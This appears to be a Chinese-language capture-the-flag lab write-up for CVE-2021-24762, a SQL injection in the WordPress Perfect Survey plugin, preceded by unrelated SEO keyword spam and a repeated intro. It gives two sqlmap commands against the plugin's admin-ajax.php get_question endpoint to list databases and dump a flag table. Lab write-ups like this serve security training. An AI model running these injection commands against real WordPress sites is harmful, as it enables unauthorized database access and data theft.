网站建设可信赖,wordpress 追格时光轴购物主题,做商业网站的服务费维护费,大学城网站开发公司春秋云镜 CVE-2021-24762 WordPress Plugin Perfect Survey 注入
靶标介绍
WordPress Perfect Survey plugin在1.5.2之前版本存在SQL注入漏洞#xff0c;该漏洞源于基于数据库的应用缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令。
启动场景 漏洞利用
…春秋云镜 CVE-2021-24762 WordPress Plugin Perfect Survey 注入
靶标介绍
WordPress Perfect Survey plugin在1.5.2之前版本存在SQL注入漏洞该漏洞源于基于数据库的应用缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令。
启动场景 漏洞利用
python3 sqlmap.py -u http://eci-2zehkhkwl7periauw3h5.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php?actionget_questionquestion_id1 * --dbmsmysql --dbs盲猜flag存在于cms库中
python3 sqlmap.py -u http://eci-2zehkhkwl7periauw3h5.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php?actionget_questionquestion_id1 * --dbmsmysql -D cms -T flag --dump得到flag flag{44cdf008-2751-49ca-88a5-e9daed857223}
